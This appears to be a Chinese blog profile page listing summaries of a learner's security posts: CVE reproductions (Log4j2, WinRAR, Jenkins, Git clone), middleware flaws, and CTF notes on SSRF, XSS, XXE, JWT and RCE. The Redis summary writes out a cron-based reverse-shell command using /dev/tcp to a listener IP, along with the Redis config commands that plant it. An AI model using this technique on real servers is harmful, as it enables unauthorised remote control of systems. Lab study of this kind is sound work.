自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(22)
  • 收藏
  • 关注

原创 中间件漏洞之weblogic

百度百科:WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。WebLogic是美商Oracle的主要产品之一,是并购BEA得来。

2025-03-17 20:54:58 1092

原创 CVE-2021-44228Log4j2远程代码执行漏洞复现

Log4j2(Log for Java) 是apache基金会的一个用于 Java 应用程序的成熟且功能强大的日志记录框架。其作用主要体现在能帮助开发者方便地记录程序运行中的各种信息,如调试信息、业务操作记录、错误信息等,便于快速定位和解决问题,同时也有助于对系统运行状况进行监控和分析。

2025-03-12 19:08:18 524

原创 CVE-2023-32233NetFilter权限提升复现

由研究人员 Patryk Sondej (波兰)和 Piotr Krysiuk(爱尔兰)发现,Linux 内核的 Netfilter 子系统在处理批量请求更新nf_tables 配置信息时,由于处理匿名集的逻辑存在缺陷,存在释放重利用(UAF)漏洞。攻击者可以通过发送特制的批处理请求,破坏 nf_tables 的内部状态,利用释放后使用的漏洞对内核内存进行任意读写操作,从而提升权限。不受影响版本:Linux 内核版本低于 v5.1-rc1 或高于 v6.3.1 的系统不受此漏洞影响。

2025-02-21 19:28:47 294

原创 CVE-2023-38831 WinRAR代码执行漏洞复现

WinRAR是一款功能强大的Windows文件压缩和解压缩工具,支持高效的压缩算法、密码保护、分卷压缩、恢复记录等功能,同时提供图形和命令行界面,以及自解压缩功能,为用户提供便捷且安全的文件管理和传输工具。WinRAR 的CVE-2023-38831 漏洞被在野利用来攻击交易类的个人用户。漏洞类型:代码注入。发现时间:2023 年。漏洞等级:高危。影响版本:WinRAR 版本 6.23 之前的版本。(引自安全内参)

2025-02-20 21:19:55 936

原创 CVE-2024-32002 Git clone远程代码执行复现

Git 是一个免费和开源的分布式版本控制系统,支持在多个系统(windows、linux、macbook)安装运行,广泛用于协作开发和管理软件项目。

2025-02-13 09:43:34 595

原创 中间件漏洞之CVE-2024-53677

在早期的 Java Web 开发中,代码往往混乱不堪,难以维护和扩展。比如,一个简单的用户登录功能,可能在不同的 Java 类、JSP 页面中到处散落着处理逻辑、数据验证等代码。Struts 框架就是为了解决这些问题而诞生的,它让开发人员能够更有条理地组织代码,提高开发效率和代码的可维护性。百度百科Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。

2025-02-03 18:29:19 1147

原创 CVE-2024-23897-Jenkins任意文件读取漏洞复现

Jenkins提供了一个命令行的接口,jenkins-clijar是它的命令行客户端,通过jenkins-clijar可以去执行一些Jenkins中的功能。利用条件:Jenkins 版本<= 2.441 和Jenkins 版本<= LTS 2.426.2+开启了Allow anonymous read access(读取完整文件)流程:因此根本原因是args4j这个库解析参数不当造成的。

2025-01-25 22:13:23 2074

原创 中间件漏洞之redis

在执行 config set dir ‘/var/spool/cron’ 和 config set dbfilename root 之前,当你使用 set 1 “\n\n\n\n* * * * * bash -i >& /dev/tcp/192.168.6.128/4444 0>&1\n\n\n\n” 时,该数据会被存储在 Redis 的内存中。(这个巨坑,搞了两天才发现是这个问题,之前还以为是centos没dict服务才导致的,还tm傻傻的看了一下午centos如何搭建字典服务),

2025-01-20 20:14:22 996

原创 1_ssrf总结

SSRF(Server-SideRequestForgery)漏洞是一种服务端请求伪造漏洞,攻击者在未获得服务器权限的情况下,利用服务器漏洞以服务器身份发送构造好的请求给服务器所在内网。这种攻击通常针对外部网络无法直接访问的内部系统。本文将详细解析SSRF漏洞的形成原理、攻击方式和防御措施。

2024-12-11 20:48:54 1281

原创 Upload-labs笔记

本笔记不是很好的教程,只是记录学习经历,写给自己看而已部分题目用在线靶场,部分题目在线靶场环境有问题,用本地搭建,如果是本地搭建,常常遇到一个问题,具体见这俩篇文章实际上我花了很多时间(好几天)在解决各种各样的环境问题上,直到我在靶场GitHub项目上发现强烈推荐使用快速搭建环境,血的教训,自己搭建经常遇到各种问题非常烦人。

2024-12-04 23:40:38 880

原创 ctfshow_xss

逻辑漏洞,注册一个账号,购买flag抓包,发现什么也没发现,于是进入转账汇款界面,给自己转账,本来我有5元,给自己转个5元看看,提示钱不足够,给admin转账1元,结果成功,再给自己转账1元,我又变回5元了,再转1元,我就有了6元,再给自己转六元还是提示余额不足,但是可以给自己转5元,变成11元,所以推测可以给自己转的最大💴数是当前余额-1元,我就先刷到321元,再转账300元抓包,发送到爆破模块,给自己转几百次300元。vps nc监听,进去注册账号后,先登录(不然不得)再修改密码,改成。

2024-11-22 15:53:58 893

原创 CTFSHOW——XXE做题

result.getElementsByTagName(“code”):从服务器返回的 XML 中提取 标签的内容。charset=utf-8”:请求的内容类型是 application/xml,表示发送 XML 数据。):使用 jQuery 更新页面上的某个元素(假设 msg 是一个显示提示信息的元素)的文本内容。url: “doLogin”:请求的目标 URL 是 doLogin,这可能是服务器的登录处理接口。dataType: “xml”:预期服务器返回的是 XML 格式的数据。

2024-10-20 20:59:54 627

原创 ctfhub web技能树进阶JSON Web Token

若目标使用非对称密码算法时,有时攻击者可以获取到公钥,此时可通过修改JWT头部的签名算法,将非对称密码算法改为对称密码算法,从而达到攻击者目的。进入登陆界面,随便登陆进去,进去后抓包把cookie里面的jwt编码拿去解码,里面有flag,把那两半拼起来即可。用了大佬的脚本,并且加了几句,直接把公钥爬下来。登进去后把cookie的jwt解码,里面的role的值改为admin,python写程序无签名加密。打开题目附件学习jwt基础知识后,将附件中的flag提交就可以了。RS256改HS256。

2024-05-25 23:30:49 606

原创 CVE-2019-11043复现

Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO 为空的情况下,存在逻辑缺陷。攻击者通过精心的构造和利用,可以导致远程代码执行。引用:https://www.jianshu.com/p/afa0752efe5c。

2024-05-07 00:24:56 397

原创 ctfshow jwt学习

JSON Web Token(JWT)是一个开放标准(RFC 7519),它定义了一种紧凑且自包含的方式,用于在各方之间安全地传输信息作为JSON对象。此信息可以被验证和信任,因为它是数字签名的。JWT可以使用秘密(使用HMAC算法)或使用RSA或ECDSA的公钥/私钥对进行签名。Header报头Payload有效载荷Signature签名因此,JWT通常看起来如下所示。Header报头Payload有效载荷iss:发行人exp:到期时间sub:主题aud:用户。

2024-05-02 17:05:15 1132 2

原创 第一届帕鲁杯ctf一点点题目答案

当然不是对这题来说,放到这题,思路就是我们本来要传的是对象b的序列化字符串,但是如果让b成为另一个类的属性,就会改变R后面的值,原理暂时不知道。就这样卡了一天,不过期间看了一篇文章:https://blog.frankli.site/2021/04/11/Security/php-src/PHP-Serialize-tips/以前只见过过滤O:\d+的,只要在数字前面加个+号即可。

2024-04-21 20:11:46 1104 7

原创 【phar反序列化学习】

phar反序列化皮毛学习。

2024-04-12 10:27:24 1317

原创 ctfshow web入门ssrf部分

因此,无论是http://www.baidu.com@10.10.10.10还是http://10.10.10.10,浏览器都会将10.10.10.10视为主机名,而不会将其与www.baidu.com或http://www.baidu.com这部分进行关联。bp里面payload的//127.0.0.1:6379/_后面的东西再url编码一次然后放包,等待响应要点时间,然后网页会重新加载,没事继续蚁剑连接木马shell.php,拿下。payload中3306/_后面的内容要再url编码一次,然后bp传。

2024-02-28 21:47:26 1942 1

原创 ctfshow RCE极限挑战刷题

比上题限制更多,长度是84以下,数字只能用0,本题和上题一样,bp传没用(反正我是这样),hackbar反而有用。【Web】无字母/数字/参RCE相关例题wp-----------csdn Z3r4y。没思路了,看了下某大佬的参考,第一次写自增绕过。还是自增绕过,payload长度做了限制。最后tac /f*即可。直接echo加反引号,先ls再tac。将长度限制到了73,数字0也不可以用了。自己在php里面写好,然后去掉换行。不是很会极限,还是参考官方答案吧。有个脚本可以看看能传哪些字符。

2024-02-25 18:35:19 642 1

原创 刷题笔记[HUBUCTF 2022 新生赛]web

开学后可能就不怎么刷题了,因为课巨多😅,可能分享其他东西,虽然寒假也没做多少。不管了反正以后不走ctf这条路。

2024-02-19 23:24:32 2578 3

原创 GXYCTF 2019刷题笔记

GXYCTF 2019 web部分

2024-02-18 22:04:48 2157 1

原创 sqli-labs第16关

随便写写。

2024-02-18 21:04:06 283 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除